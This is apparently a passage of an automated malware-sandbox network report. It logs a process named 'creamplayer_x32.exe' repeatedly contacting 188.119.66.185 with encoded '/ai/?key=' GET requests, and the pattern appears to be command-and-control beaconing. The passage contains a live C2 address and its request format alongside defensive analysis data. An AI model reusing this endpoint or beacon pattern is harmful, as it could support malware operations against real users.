                                                                                                  Dec 14, 2024 14:09:13.599787951 CET44349958188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:14.395307064 CET44349958188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:14.395394087 CET49958443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:14.395401955 CET44349958188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:14.395498037 CET49958443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:14.516974926 CET49958443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:14.517018080 CET44349958188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:14.641376019 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:14.641447067 CET44349966188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:14.641531944 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:14.642040014 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:14.642055988 CET44349966188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:16.300993919 CET44349966188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:16.301206112 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:16.301714897 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:16.301723957 CET44349966188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:16.301908016 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:16.301912069 CET44349966188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:17.032457113 CET44349966188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:17.032525063 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:17.032537937 CET44349966188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:17.032582998 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:17.033044100 CET49966443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:17.033068895 CET44349966188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:17.147063971 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:17.147118092 CET44349972188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:17.147202969 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:17.147550106 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:17.147561073 CET44349972188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:18.610076904 CET44349972188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:18.610269070 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:18.610564947 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:18.610575914 CET44349972188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:18.610722065 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:18.610728025 CET44349972188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:19.305850983 CET44349972188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:19.305929899 CET44349972188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:19.305969954 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:19.305986881 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:19.306190014 CET49972443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:19.306211948 CET44349972188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:19.428271055 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:19.428395033 CET44349978188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:19.428484917 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:19.428704977 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:19.428728104 CET44349978188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:20.892164946 CET44349978188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:20.892261982 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:20.892852068 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:20.892859936 CET44349978188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:20.893079996 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:20.893085003 CET44349978188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:21.592302084 CET44349978188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:21.592384100 CET44349978188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:21.592439890 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:21.592473030 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:21.592654943 CET49978443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:21.592678070 CET44349978188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:21.709511995 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:21.709553957 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:21.709628105 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:21.709847927 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:21.709861040 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:23.366094112 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:23.366200924 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:23.372798920 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:23.372817039 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:23.372976065 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:23.372980118 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:24.084908962 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:24.085097075 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:24.085144997 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:24.085175037 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:24.085207939 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:24.085267067 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:24.085582018 CET49984443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:24.085597038 CET44349984188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:24.194974899 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:24.195020914 CET44349990188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:24.195286036 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:24.195496082 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:24.195513010 CET44349990188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:25.660044909 CET44349990188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:25.663333893 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:25.685082912 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:25.685092926 CET44349990188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:25.685281992 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:25.685286045 CET44349990188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:26.359564066 CET44349990188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:26.359642029 CET44349990188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:26.359656096 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:26.359690905 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:26.360024929 CET49990443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:26.360044956 CET44349990188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:26.475294113 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:26.475352049 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:26.475438118 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:26.475717068 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:26.475733995 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:27.945693970 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:27.945791006 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:27.946451902 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:27.946470976 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:27.946762085 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:27.946774006 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:28.647897959 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:28.647981882 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:28.648009062 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:28.648050070 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:28.648083925 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:28.648123980 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:28.665466070 CET49996443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:28.665499926 CET44349996188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:28.888784885 CET49999443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:28.888829947 CET44349999188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:28.889082909 CET49999443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:28.889235020 CET49999443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:28.889244080 CET44349999188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:30.381167889 CET44349999188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:30.381247997 CET49999443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:30.381671906 CET49999443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:30.381685972 CET44349999188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:30.381833076 CET49999443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:30.381839991 CET44349999188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:31.084343910 CET44349999188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:31.084554911 CET44349999188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:31.084628105 CET49999443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:31.084945917 CET49999443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:31.084964991 CET44349999188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:31.197206020 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:31.197256088 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:31.197350979 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:31.197640896 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:31.197650909 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:32.873862028 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:32.874191999 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:32.874747038 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:32.874762058 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:32.877553940 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:32.877564907 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.567924976 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.568016052 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.568042040 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.568089962 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.568104982 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.568244934 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.568273067 CET50000443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.568294048 CET44350000188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.695638895 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.695687056 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:33.695949078 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.696225882 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:33.696240902 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.171567917 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.176443100 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.187897921 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.187907934 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.190016985 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.190023899 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.911497116 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.911580086 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:35.911602020 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.911621094 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.944992065 CET50001443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:35.945019960 CET44350001188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:36.075098991 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:36.075136900 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:36.075254917 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:36.075598955 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:36.075613976 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:37.584052086 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:37.584228039 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:37.585139990 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:37.585150003 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:37.587487936 CET50002443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:09:37.587493896 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:38.363116026 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:38.363192081 CET44350002188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:09:38.363291979 CET50002443192.168.2.9188.119.66.185
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 14, 2024 14:07:26.969429970 CET1.1.1.1192.168.2.90xba8fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 14, 2024 14:07:26.969429970 CET1.1.1.1192.168.2.90xba8fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                  • 188.119.66.185
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.949844188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:29 UTC283OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda322c18d43188 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:30 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:30 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:30 UTC686INData Raw: 32 61 32 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 63 32 37 62 36 62 63 38 66 38 30 32 32 34 63 62 64 33 62 63 31 39 30 32 34 39 66 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 31 63 61 32 39 37 34 64 35 66 36 34 63 63 34 39 36 66 63 35 32 64 36 64 62 39 63 35 66 61 64 62 36 66 34 63 31 30 33 30 32 63 34 64 30 31 62 31 63 64 61 33 30 33 61 31 61 64 35 32 65 38 64 64 33 64 31 39 65 35 63 34 38 63 39 37 30 33 66 66 30 64 38 31 38 35 37 36 39 30 65 37 33 63 39 66 36 30 61 37 34 62 64 66 61 35 35 61 66 65 65 65 62 35 32 61 31 37 33 63 65 64 34 32 30 66 31 66 32 64 38 65 65 34 38 31 32 39 31 35 62 39 61 33 34 61 63 33 34
                                                                                                  Data Ascii: 2a28b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c4d01b1cda303a1ad52e8dd3d19e5c48c9703ff0d81857690e73c9f60a74bdfa55afeeeb52a173ced420f1f2d8ee4812915b9a34ac34


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.949858188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:35 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:35 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:35 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:35 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.949864188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:37 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:38 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:37 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:38 UTC542INData Raw: 32 31 32 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 63 36 38 33 35 65 37 65 66 35 36 65 61 61 66 34 37 63 31 39 39 62 37 63 61 33 64 37 34 64 32 66 34 35 32 63 65 39 66 66 65 35 32 64 35 64 34 38 31 35 34 61 38 62 33 65 61 63 33 30 63 30 61 63 64 64 37 30 35 31 65 64 65 33 38 32 33 31 31 63 64 33 31 38 38 64 35 63 63 39 36 35 66 34 61 64 37 37 33 33 34 66 33 64 65 30 36 35 35 36 66 31 62 37 33 63 61 66 62 30 61 37 30 62 61 65 64 35 62 61 66 66 30 65 61 35 34 61 64 37 65 63 37 63 61 32 31 66 35 66 38 63 65 65 65 35 34 31 32 38 66 35 61 38 34 33 66 61 39 33 35
                                                                                                  Data Ascii: 2128b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123c6835e7ef56eaaf47c199b7ca3d74d2f452ce9ffe52d5d48154a8b3eac30c0acdd7051ede382311cd3188d5cc965f4ad77334f3de06556f1b73cafb0a70baed5baff0ea54ad7ec7ca21f5f8ceee54128f5a843fa935


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.949873188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:39 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:40 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:40 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:40 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.949880188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:42 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:43 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:42 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:43 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.949886188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:44 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:45 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:45 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:45 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.949892188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:46 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:47 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:47 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:47 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.949898188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:49 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:50 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:49 GMT
